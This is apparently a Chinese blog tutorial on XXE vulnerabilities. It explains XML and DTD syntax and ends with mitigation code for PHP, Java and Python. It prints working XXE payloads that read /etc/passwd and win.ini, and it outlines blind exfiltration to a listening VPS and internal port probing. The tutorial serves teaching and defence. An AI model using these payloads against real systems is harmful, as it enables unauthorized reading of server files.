浅谈XXE漏洞

XXE漏洞:程序在解析输入的XML数据的时候,解析了攻击者的伪造的外部实体产生的。

危害:SSRF攻击,使用file协议任意读取文件,端口探测,执行系统命令

什么是XML

XML是一种用来传输和存储数据的可扩展标记语言。

XML用于传输和数据存储。HTML用于显示数据。

Dtd文档类型定义是一套为了进行程序见的数据交换而建立的关于标记符的语法规则。

1.1 xml语法

语法规则

1.所有的XML元素都必须有一个关闭标签

2.XML标签对大小写敏感

3.XML必须正确嵌套

4.XML属性值必须加引号“”

5.实体引用:在标签属性,或者对应位置值可能出现<>符号,这些在对应的xml中都是特殊含义的,那么必须使用对应html的实体对应的表示:例如,<message>if salary < 1000 then </message>如果把这个“<”放在元素中,那么解析器会把他当成新元素的开始,就会发生报错。为了避免这个错误使用实体引用来代替<message>if salary &lt; 1000 then </message>

1.2 xml结构

XML 文档声明,在文档的第一行

XML 文档类型定义,即DTD,XXE 漏洞所在的地方

XML 文档元素

1.3 XML DTD(文档类型定义)

DTD的作用就是用来定义XML文档的合法构建模块DTD可以在XML文档内声明,也可以在外部引用。

内部声明DTD  <!DOCTYPE 根元素 [元素声明]>
外部声明DTD  <!DOCTYPE 根元素 SYSTEM "文件名">
<!DOCTYPE note SYSTEM "Note.dtd">
或者<!DOCTYPE 根元素 PUBLIC "public_ID" "文件名">

 

 

XML显示的话会显示一个XML格式。

网站在window系统上搭建:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE ANY [

<!ENTITY xxes SYSTEM "file:///c:/windows/win.ini"> ]>

<user><username>&xxes;</username><password>admin</password></user>

网站在linux系统上搭建:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE ANY [

<!ENTITY xxes SYSTEM "file:///etc/passwd"> ]>

<user><username>&xxes;</username><password>admin</password></user>

如果存在XXE漏洞话直接输入恶意的payload会进行文件读取:

上面是文件读取有回显的。

如果是没有回显的话可以采取:blind XXE

我们可以利用HTTP协议发送到远程服务器上,写一个dtd文件:

 然后在服务器上监听8081端口:

 然后构造xxe代码输入到输入框进行提交:

 然后在vps看一下监听:

 Base64加密解密一下:

 端口探测:

 

利用外部实体攻击的http协议探测内网存活端口

如果面对JSON提交方式的话我们得去尝试会不会解析xml,修改content-type为xml,然后写一个xml看响应包会不会解析:

JSON提交方式:

 写进xml发现会进行解析:

 

还是回显的xxe我们可以直接构造payload进行读取passwd:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPEANY[<!ENTITYxxesSYSTEM"file:///etc/passwd"> ]>

<root>

&xxes;</root>

 

预防XXE注入漏洞

方案:使用开发语言提供的禁用外部实体的方法

1.PHP:

libxml_disable_entity_loader(true);

2.JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();

dbf.setExpandEntityReferences(false);

3.Python:

from lxml import etree

xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值